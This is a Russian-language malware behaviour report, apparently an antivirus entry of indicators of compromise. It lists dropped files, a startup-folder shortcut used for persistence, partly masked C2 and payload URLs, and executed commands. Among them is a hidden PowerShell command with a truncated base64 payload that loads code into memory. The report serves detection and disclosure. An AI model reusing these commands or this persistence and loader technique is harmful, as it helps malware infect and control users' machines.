Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\vista.ini.lnk
- %APPDATA%\processlassosetup32.exe
- %APPDATA%\for.js
- %TEMP%\nsz10ac.tmp
- %TEMP%\nsu10dc.tmp\system.dll
- %TEMP%\nsu10dc.tmp\langdll.dll
- %HOMEPATH%\appdata\vista.js
- http://ip##fo.io/ip
- http://ip##fo.io/country
- http://ne##rim.top/bit/R.mp3
- http://ne##rim.top/gate.php
- DNS ASK ne##rim.top
- DNS ASK ip##fo.io
- '%APPDATA%\processlassosetup32.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\for.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...